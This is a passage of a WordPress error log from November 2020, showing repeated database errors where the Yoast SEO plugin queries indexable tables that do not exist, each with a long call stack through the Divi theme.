WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query SELECT <code>indexable_id</code> FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>ancestor_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Ancestor_Watcher->reset_children, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->find_children, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query SELECT <code>indexable_id</code> FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>ancestor_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Ancestor_Watcher->reset_children, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->find_children, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1447' AND <code>object_type</code> = 'post' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:38', '2020-11-20 21:01:38') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1447' AND <code>object_type</code> = 'post' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1336' AND <code>object_type</code> = 'post' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query UPDATE <code>wp_tz3c246s0h_yoast_indexable</code> SET <code>has_public_posts</code> = '0', <code>permalink</code> = 'https://www.drumcafe.com/author/drumcafe/', <code>permalink_hash</code> = '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', <code>updated_at</code> = '2020-11-20 21:01:38' WHERE <code>id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1336' AND <code>object_type</code> = 'post' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> = 'attachment' AND <code>post_status</code> = 'inherit' AND <code>post_parent</code> = '1169' AND <code>has_public_posts</code> IS NOT NULL made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Helpers\Post_Helper->update_has_public_posts_on_attachments, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> = 'attachment' AND <code>post_status</code> = 'inherit' AND <code>post_parent</code> = '1169' AND <code>has_public_posts</code> IS NOT NULL made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Helpers\Post_Helper->update_has_public_posts_on_attachments, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> = '1' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_public_post, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query UPDATE <code>wp_tz3c246s0h_yoast_indexable</code> SET <code>permalink</code> = 'https://www.drumcafe.com/post-apple-conference/', <code>permalink_hash</code> = '47:6dac5910761dfb89217dca89a096869a', <code>updated_at</code> = '2020-11-20 21:01:38' WHERE <code>id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, 